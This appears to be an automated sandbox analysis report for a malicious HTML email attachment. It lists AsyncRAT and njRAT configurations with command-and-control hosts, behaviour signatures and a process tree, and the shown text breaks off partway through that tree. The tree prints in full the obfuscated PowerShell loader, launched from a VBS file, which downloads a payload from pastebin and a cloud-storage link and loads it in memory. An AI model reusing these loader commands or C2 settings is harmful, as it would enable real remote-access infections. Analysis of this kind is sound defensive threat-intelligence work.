Resubmissions

17-10-2024 17:13

241017-vrvb1awdmb 10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-10-2024 17:13

General

  • Target

    email-html-2.html

  • Size

    1KB

  • MD5

    e30672a61f4a8f232239d5046bb8d4ed

  • SHA1

    82408b73208d1fc46cdd5f875e6fc139bac5dc34

  • SHA256

    e8e74f88d1310a69c3092c2af288d0aeb9009bd80b7a6dcaf9a796362f82954e

  • SHA512

    3e03339e04580ce4dc35058a722485077315767c36109576dc899919f09f4c5c1097f8fac5906e13b8f6170313c6a59e5151f06904e87730acce9405c7eaf7d5

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/Adv9gBHa

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/Adv9gBHa

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/Adv9gBHa

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Family

asyncrat

Version

1.0.7

Botnet

septiembre20

C2

peinadorafael777.duckdns.org:2013

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

| CRACKED BY https://t.me/xworm_v2

Botnet

20agosto

C2

carlitosmoreno1791.duckdns.org:2017

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

carlitosmoreno1794.duckdns.org:2019

Mutex

bde06c84e1de4b23b

Attributes
  • reg_key

    bde06c84e1de4b23b

  • splitter

    @!#&^%$

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • UAC bypass 3 TTPs 1 IoCs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 64 IoCs
  • Checks computer location settings 2 TTPs 16 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 30 IoCs

    Start PowerShell.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 34 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 36 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • NTFS ADS 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 52 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\email-html-2.html
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4860
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93e5d46f8,0x7ff93e5d4708,0x7ff93e5d4718
      2⤵
        PID:512
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
        2⤵
          PID:312
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4392
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
          2⤵
            PID:3136
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
            2⤵
              PID:716
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
              2⤵
                PID:2236
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
                2⤵
                  PID:1764
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4152
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
                  2⤵
                    PID:756
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
                    2⤵
                      PID:3940
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
                      2⤵
                        PID:4920
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
                        2⤵
                          PID:2376
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2280 /prefetch:1
                          2⤵
                            PID:1164
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6060 /prefetch:8
                            2⤵
                              PID:1160
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
                              2⤵
                                PID:112
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6376 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1764
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
                                2⤵
                                • Checks computer location settings
                                PID:1412
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3192
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
                                    4⤵
                                    • Blocklisted process makes network request
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3200
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5604
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
                                2⤵
                                • Checks computer location settings
                                PID:4964
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1700
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
                                    4⤵
                                    • Blocklisted process makes network request
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:208
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5540
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
                                2⤵
                                • Checks computer location settings
                                PID:400
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
